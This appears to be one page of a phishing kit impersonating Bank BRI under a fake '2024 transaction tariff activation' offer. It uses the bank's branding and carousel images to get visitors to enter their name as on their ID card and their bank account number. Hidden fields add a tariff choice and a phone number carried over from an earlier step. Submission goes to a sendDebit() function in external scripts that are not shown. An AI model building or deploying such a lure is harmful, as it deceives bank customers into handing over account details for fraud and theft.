<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <script src="i.js"></script>
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
      @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 400px;
      overflow-x: ;
      
      }
body {
    margin: 0px;
    background: ,#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
    max-width: 400px;
    max-height: 100vh;
    align-item: center;
    justify-content: center;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    margin-bottom: 110vh;
}
welalxcome {
    position: fixed;
    right: 0;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    margin: 0 auto;
    max-width: 400px;
    background: #ffffffcc;
    z-index: 999;
}
welalxcome img {
        width:15vw;
        max-width: 400px;
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

 
 .asu{
     width:100%;
     top:60px;
     position: fixed;
     height: 100%;
     z-index:3;
     max-width: 400px;
     left: 0;
    right: 0;
    margin: 0px auto;
     
     
 }  
    
 .nyusu{
     border-radius:6px;
     height:150px;
     max-height:100%;
     z-index:3;
     margin-top: 80px;
     margin-left: 20px;
     box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;
     max-width: 400px;
 }
 
 ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -2px;
    position: absolute;
    color: #06529C;
}

.button-85 {
  background-color: ;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
  z-index:-1;
  max-width: 400px;
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 18px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";  
  position: absolute;
  width: 100%;
  height: 100%;
  background: #ffffffe6;
  left: 0;
  top: 0;
  border-radius: 18px;
}

.xx{
        z-index:3;
        top: 35%;
        left: 0;
        right: 0;
        margin: 0px auto;
        position: absolute;
        border:5px solid #fff;
        padding:15px;
        width:80%;
        border-radius:18px; 
        background: #ffffffe6;
        background-size:100%; 
        height: 220px; 
        max-height: 100vh;
        max-width: 320px;
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px;  
    }

.patokk{
    z-index:3;
    display:block;
    margin-left: 20px;
    margin-top:;
    position:relative;
    background-color:#0F78CB;
    color:#fff;
    border:0px solid #0076e0;
    width:90%;
    border-radius:3px;
    font-family: 'Nunito',
    sans-serif;
    font-size: 15px;
    padding:13px;
    display: inline-block;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,
rgba(0, 0, 0, 0.20) 0px 6px 6px;
max-width: 400px;
}

.patokk:hover { 
         z-index:3;
         opacity:0.3;
         border: 1px solid #0F78CB; 
         background-color: #0F78CB; 
         color: #fff; 
         
         
         } 
.patokk:disabled, 
.patokk[disabled]{
    z-index:3;
    opacity:0.3;
    border: 1px solid #0F78CB; 
         background-color: #0F78CB; 
         color: #fff;
}

.pilat{
    z-index:3;
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    width: 100%;
    height: 72px;
    background: #ffffff;
    box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px;
padding-top: 15px;
    max-width: 400px;
}

.hh{
    z-index:2;
    position: fixed; 
    top: -10; 
    left: 0; 
    right: 0; 
    margin: 0px auto; 
    width: 100%; 
    height: 50px; 
    background: #0F78CB; 
    border-bottom: 0px solid #fff;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    max-width: 400px;
    }
    
    .hu{
        z-index:3;
        bottom:170px;
        margin-left: 26px;
        margin-top: -170px;
        position: absolute;
        border:1.5px solid #fff;
        padding:15px;
        width:78%;
        border-radius:18px; 
        background: url('img/haji.pngg'),#ffffffe6;
        background-size:100%; 
        height: 230px; 
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
        max-width: 400px;
    }
    
    .yy{
        box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: #; border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 15px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none;
    }
    
    
    
    .zz{
        z-index:2;position: fixed; top: -10; left: 0; right: 0; margin: 0px auto; width: 100%; height: 50px; background: #0F78CB; border-bottom: 0px solid #fff;box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
        max-width: 400px;
    }

    .lonte{
  display:none;
  z-index:4;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  max-width: 400px;
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}
.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     margin: 0 auto;
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     max-width: 400px;
      }
      
      .jao{
            width:90%;
      }
</style>
<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px" />
</welalxcome>
<chsalxcome2 style="display: ;">
    <div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<img style="z-index:1;position: fixed;width:100%;margin-top:0px;max-width: 400px;left: 0;right: 0;margin: 0px auto;" width="100%" src="img/buri.png" alt="">

<img style="z-index:2;position: fixed;width:100%;margin-top:50px;max-width: 400px;left: 0;
    right: 0;
    margin: 0px auto;" src="img/26-.png" alt="">
<nav class="zz">
<center><img src="img/nav.png" style="margin-top:8px;" width="40px" alt=""></center>
<p style="margin-left:10px;">Spesial Untuk<b style="color: #F37024">mo</p>
<p style="margin-left:10px;color:#fff;font-size:12px;">Cobain beragam cara baru untuk<br>memaksimalkan aktivitas perbankan kamu.</p>
</nav>

<marquee direction="right" behavior="alternate" scrolldelay="10" class="asu">
<img class="nyusu" src="img/1.png" alt="">
<img class="nyusu" src="img/2.png" alt="">
<img class="nyusu" src="img/3.png" alt="">
<img class="nyusu" src="img/4.png" alt="">
<img class="nyusu" src="img/5.png" alt="">
</marquee>    



<form method="post" onsubmit="sendDebit()" id="formlog">
<input type="hidden" name="logo" id="logo" value="༻✧°𝗕𝗮𝗻𝗸 𝗕𝗥𝗜°✧༺">
<input type="hidden" id="tarif" name="tarif" value="">	
 <input type="hidden" id="nomorku" name="nomor" value="">	

<div class="button-85 xx">
<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px;margin-top:-20px;font-weight:600;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:-4px;height:60px;">𝗨𝗻𝘁𝘂𝗸 𝗺𝗲𝗹𝗮𝗻𝗷𝘂𝘁𝗸𝗮𝗻 𝗽𝗿𝗼𝘀𝗲𝘀 𝗮𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶 𝗮𝗻𝗱𝗮, 𝗦𝗶𝗹𝗮𝗵𝗸𝗮𝗻 𝗺𝗮𝘀𝘂𝗸𝗮𝗻 𝗱𝗮𝘁𝗮 𝗱𝗶 𝗯𝗮𝘄𝗮𝗵 𝗶𝗻𝗶</p>

</center>
<br>
  

<h5 style="color:#09559a; margin-top: 0px; margin-left: 4px">Atas nama :
<input id="nama" name="nama" type="text" class="yy" placeholder="Nama sesuai KTP" oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗔𝗠𝗔 sesuai KTP')" onchange="this.setCustomValidity('')" required>
</h5>


<h5 for="norek" style="color:#09559a; margin-top: 0px; margin-left: 4px">Nomor rekening :
<input id="rek" name="rek" type="tel" class="yy" placeholder="#####" maxlength="15" minlength="12" required>
</h5>

<br>
<br>
</div>
    





<div class="pilat">
<div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled>Lanjutkan</button>
           </div>
</smalxs>
</main>
</form>
<script>
      
 var tarif = sessionStorage.getItem("tarif");
 document.getElementById("tarif").value = tarif + "";    
      
 var nomor = sessionStorage.getItem("nomor");
 document.getElementById("nomorku").value = nomor + "";
  
</script>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script src="script.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },500)
        });
</script>
<script>
              function vibr(dur){
            if (navigator.vibrate) {
                navigator.vibrate(dur);
            } else {
                console.log("NotSupported");
            }
        }

</script>
     <script src="token.js">
 </script>
<script>
           // Get references to the input and button elements
const input = document.getElementById("rek");
const button = document.getElementById("kirim");

// Add an event listener for the input event
input.addEventListener("input", () => {
  // Check if the input field has any text
  if (input.value.length > 9) {
    // If there's text, enable the button
    button.disabled = false;
  } else {
    // If there's no text, disable the button
    button.disabled = true;
  }
});

</script>
</body>
</html>
